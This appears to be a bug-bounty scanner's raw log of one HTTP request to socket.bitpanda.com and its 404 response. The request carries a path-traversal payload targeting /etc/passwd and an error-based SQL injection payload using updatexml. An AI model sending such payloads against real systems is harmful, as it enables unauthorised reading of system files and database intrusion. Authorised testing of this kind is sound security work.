[honeypot-detect] Dumped HTTP request for https://socket.bitpanda.com/?30rugxNo91H3eMIrN0EA2U4XCCp=../../../../../../../../etc/passwd&30rugxNo91H3eMIrN0EA2U4XCCp=1%20and%20updatexml(1,concat(0x7e,(select%20md5(16119))),1)


GET /?30rugxNo91H3eMIrN0EA2U4XCCp=../../../../../../../../etc/passwd&30rugxNo91H3eMIrN0EA2U4XCCp=1%20and%20updatexml(1,concat(0x7e,(select%20md5(16119))),1) HTTP/1.1
Host: socket.bitpanda.com
User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Cookie: AWSALB=JmPmmIvlTZj9VJ+2kxr2L0v5a8rUIkX8u/vlNCm7P1v1G865Bpm5TBp9984wiLJ7mBwCHoaFIWf7d2Mer1nEQ0uaPpvrPsDIBT70Z0lkorv3rExKYYfKP5R/+ij9; AWSALBCORS=JmPmmIvlTZj9VJ+2kxr2L0v5a8rUIkX8u/vlNCm7P1v1G865Bpm5TBp9984wiLJ7mBwCHoaFIWf7d2Mer1nEQ0uaPpvrPsDIBT70Z0lkorv3rExKYYfKP5R/+ij9
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
Accept-Encoding: gzip


[honeypot-detect] Dumped HTTP response https://socket.bitpanda.com/?30rugxNo91H3eMIrN0EA2U4XCCp=../../../../../../../../etc/passwd&30rugxNo91H3eMIrN0EA2U4XCCp=1%20and%20updatexml(1,concat(0x7e,(select%20md5(16119))),1)

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 28
Content-Type: application/json; charset=utf-8
Date: Tue, 05 Aug 2025 12:52:29 GMT
Etag: W/"1c-MOxLziJPE3pYclichFPQin1Cisg"
Referrer-Policy: strict-origin-when-cross-origin
Server: istio-envoy
Set-Cookie: AWSALB=nF84ptElmKECoqXrjElPrnzn+L3VqNrev4IqV8GruYstt+2vdYTX9HW/dVm6piXboHmBfveYHCC2XW8Cag2dHy1Fuvc789dKiaL6IHDNb8GBkiAqiY+YoAA9RTCZ; Expires=Tue, 12 Aug 2025 12:52:29 GMT; Path=/
Set-Cookie: AWSALBCORS=nF84ptElmKECoqXrjElPrnzn+L3VqNrev4IqV8GruYstt+2vdYTX9HW/dVm6piXboHmBfveYHCC2XW8Cag2dHy1Fuvc789dKiaL6IHDNb8GBkiAqiY+YoAA9RTCZ; Expires=Tue, 12 Aug 2025 12:52:29 GMT; Path=/; SameSite=None; Secure
Strict-Transport-Security: max-age=31536000
Via: 1.1 9cd85e528eb96b937681f7f81aea46c8.cloudfront.net (CloudFront)
X-Amz-Cf-Id: uRwKxbBPXW9UKx62IdA86lzM5_MzYZtlRa6ywVLvf0M41G9D4TnObQ==
X-Amz-Cf-Pop: IAD61-P2
X-Cache: Error from cloudfront
X-Content-Type-Options: nosniff
X-Envoy-Decorator-Operation: socket-server.socket-server.svc.cluster.local:80/*
X-Envoy-Upstream-Service-Time: 7
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block

{"message":"Page not found"}
